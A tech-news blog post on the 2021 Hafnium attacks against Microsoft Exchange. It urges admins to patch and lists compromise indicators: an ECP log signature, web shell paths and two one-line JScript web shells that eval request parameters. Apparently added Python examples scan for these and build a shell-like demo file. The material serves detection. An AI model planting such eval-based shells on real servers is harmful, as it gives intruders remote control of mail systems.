Microsoft Exchange Server with huge security gap: Update urgently!

[Post image: Microsoft Exchange Server, © 2021 Microsoft]

A few days ago Microsoft released an urgent update for a security hole in Microsoft Exchange Server 2013, 2016 and 2019. Attackers are already exploiting the vulnerability on numerous servers. Admins of company and customer servers should update the popular mail server immediately, if they have not already done so.

Microsoft has closed security holes that a Chinese hacker group called "Hafnium" is currently alleged to be exploiting on a massive scale. The corresponding blog post from Microsoft speaks of several zero-day exploits. Specifically, it concerns CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 and CVE-2021-27065, which were patched on Wednesday. According to Microsoft, these are currently "limited targeted attacks", but they could quickly be followed by automated bots. Admins should therefore act urgently now.

According to Volexity, these attacks may have been running since January 6, 2021, but only really took off on Wednesday. A video also demonstrates what exploitation of the vulnerability looks like.

Microsoft Exchange Server Vulnerability: Who Is Affected?

Exchange 2013, Exchange 2016 and Exchange 2019 installations that have not applied the current patch are affected. Microsoft provides the patch for the last two cumulative updates (CUs) of each version, except for Exchange 2013: there is a patch for Exchange 2013 CU23, for Exchange 2016 CU18 and CU19, and for Exchange 2019 CU7 and CU8. We have linked the download pages for the corresponding CUs. Important information about the update is available here.

If no patch is available for the cumulative update in use, you will have to update to a supported CU first. The patches are also rolled out via Windows Update, but probably only apply to the versions mentioned. Incidentally, the CU version in use can be checked via the Exchange Management Shell, as described here.

According to an analysis by CERT.at, in Austria alone over 4,000 Exchange servers are very likely vulnerable. In Germany, according to the security search engine Shodan, it should be over 57,000; worldwide there are around 266,000 affected servers. The German Federal Office for Information Security (BSI) warns of the vulnerability and has issued a red alert. The BSI also recommends "checking all systems that were not updated immediately on Wednesday night to see whether a compromise has occurred. To do this, Exchange systems must be checked for known web shells."

Users of Office 365 (now: Microsoft 365) have nothing to worry about: Microsoft already takes care of all necessary updates and security patches there.

Microsoft Exchange Server Vulnerability: Have I Been Attacked?

Difficult to say, and it depends on the server. However, Microsoft lists some indicators in its blog post that can point to an attack. The security experts at Rapid7 offer further technical analyses of the attacks on their website. In most cases, however, you will find POST requests for "/ecp/y.js" in the IIS ECP logs, carried out with various Python scripts:

"/ecp/y.js","X-BEResource-Cookie","python-requests/2.25.1"

Such a call does not necessarily mean that data has already been exfiltrated. During the attack, the hackers place web shells on the server, through which data can be extracted, even after the patch has been installed! Microsoft provides a script on GitHub that analyzes the logs for some of the attack methods and provides information about a possible attack.
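A small scanner for the log indicator quoted above, added here as an example and not taken from Microsoft's or Rapid7's tooling. The sample log lines are constructed in the CSV style of the quoted entry; real ECP server logs carry many more columns, so the scanner matches tokens rather than fixed column positions.

```python
import csv
import io
from typing import Dict, List

# Constructed sample in the style of the entry quoted above (not a real log).
SAMPLE_ECP_LOG = """\
"2021-03-03T04:12:09.114Z","/ecp/DDI/DDIService.svc/GetList","-","Mozilla/5.0"
"2021-03-03T04:12:10.551Z","/ecp/y.js","X-BEResource-Cookie","python-requests/2.25.1"
"2021-03-03T04:13:41.020Z","/ecp/y.js","X-BEResource-Cookie","python-requests/2.25.1"
"2021-03-03T04:14:02.781Z","/ecp/default.aspx","-","Mozilla/5.0"
"""

# Indicators named in the post: the request path and the scripted user agent.
SUSPICIOUS_PATHS = {"/ecp/y.js"}
SUSPICIOUS_UA_PREFIXES = ("python-requests/",)


def scan_ecp_log(text: str) -> List[Dict[str, object]]:
    """Return one finding per log row that requests a suspicious path.

    The user agent is reported separately so that an analyst can tell
    scripted hits (python-requests) from anything else touching the path.
    """
    hits: List[Dict[str, object]] = []
    for row in csv.reader(io.StringIO(text)):
        cells = [c.strip() for c in row]
        if not cells:
            continue
        path = next((c for c in cells if c.lower() in SUSPICIOUS_PATHS), None)
        if path is None:
            continue
        ua = next((c for c in cells if c.lower().startswith(SUSPICIOUS_UA_PREFIXES)), "")
        hits.append({"time": cells[0], "path": path, "ua": ua, "scripted": bool(ua)})
    return hits


if __name__ == "__main__":
    for hit in scan_ecp_log(SAMPLE_ECP_LOG):
        print(hit)
```

Point it at the exported ECP server log text instead of the sample; a scripted hit is a reason to run Microsoft's GitHub script and the web shell checks below, not proof of exfiltration.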

In addition, according to the BSI, possible shells could be under

%PROGRAMFILES%\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\

as RedirSuiteServerProxy.aspx, or under

C:\inetpub\wwwroot\aspnet_client\

have been placed. With this GitHub script from a developer, the system can be checked for other web shells. These shells often contain the following as the ExternalUrl:

http://f/<script language="JScript" runat="server">function Page_Load(){eval(Request["Ananas"],"unsafe");}</script>

or

http://f/<script language="JScript" runat="server">function Page_Load(){eval(Request["klk123456"],"unsafe");}</script>
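A file scanner for the two shell locations and the ExternalUrl pattern quoted above, added here as an example and not the developer's GitHub script. It walks the given roots (on a real server these would be the BSI paths above), flags the known file name and any .aspx file whose contents match the server-side eval(Request[...]) signature, and builds a constructed demo tree in a temporary directory so it runs offline.

```python
import os
import re
import tempfile
from typing import Dict, List, Optional

# Signature of the shells quoted above: server-side JScript that evals a request parameter.
SHELL_RE = re.compile(
    r'<script[^>]*runat="server"[^>]*>.*?eval\(Request\["(?P<param>[^"]+)"\]',
    re.IGNORECASE | re.DOTALL,
)
# File name named by the BSI (compared case-insensitively).
KNOWN_SHELL_NAMES = {"redirsuiteserverproxy.aspx"}


def shell_parameter(content: str) -> Optional[str]:
    """Return the request parameter the shell evals, or None if no match."""
    m = SHELL_RE.search(content)
    return m.group("param") if m else None


def scan_for_webshells(roots: List[str]) -> List[Dict[str, str]]:
    """Walk each root and report .aspx/.asp files that look like a shell."""
    findings: List[Dict[str, str]] = []
    for root in roots:
        for dirpath, _, files in os.walk(root):
            for name in files:
                if not name.lower().endswith((".aspx", ".asp")):
                    continue
                full = os.path.join(dirpath, name)
                with open(full, "r", encoding="utf-8", errors="replace") as fh:
                    param = shell_parameter(fh.read())
                if param is not None:
                    findings.append({"path": full, "param": param, "reason": "eval(Request[...]) pattern"})
                elif name.lower() in KNOWN_SHELL_NAMES:
                    findings.append({"path": full, "param": "", "reason": "known shell filename"})
    return findings


def build_demo_tree() -> str:
    """Constructed sample tree: one shell-like file beside one benign page."""
    base = tempfile.mkdtemp()
    auth = os.path.join(base, "owa", "auth")
    os.makedirs(auth)
    with open(os.path.join(auth, "RedirSuiteServerProxy.aspx"), "w", encoding="utf-8") as fh:
        fh.write('http://f/<script language="JScript" runat="server">'
                 'function Page_Load(){eval(Request["Ananas"],"unsafe");}</script>')
    with open(os.path.join(auth, "logon.aspx"), "w", encoding="utf-8") as fh:
        fh.write('<%@ Page Language="C#" %><html><body>Sign in</body></html>')
    return base
```

On a suspected server, run it against the two BSI paths and treat any finding as a reason to preserve the file and its timestamps for incident response before removing it.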

To all admins who are reading this right now: Good luck with patching, keep calm & don't forget backups! Anyone who is still considering whether to apply the patches this weekend: yes, of course.

David Wurm

Has been doing the TechnikNews thing together with a great team since 2015. Works in the background on the server infrastructure and is also responsible for everything editorial. Is fascinated by current technology and enjoys blogging about everything digital. In his free time he can often be found developing websites, taking photographs or making radio.
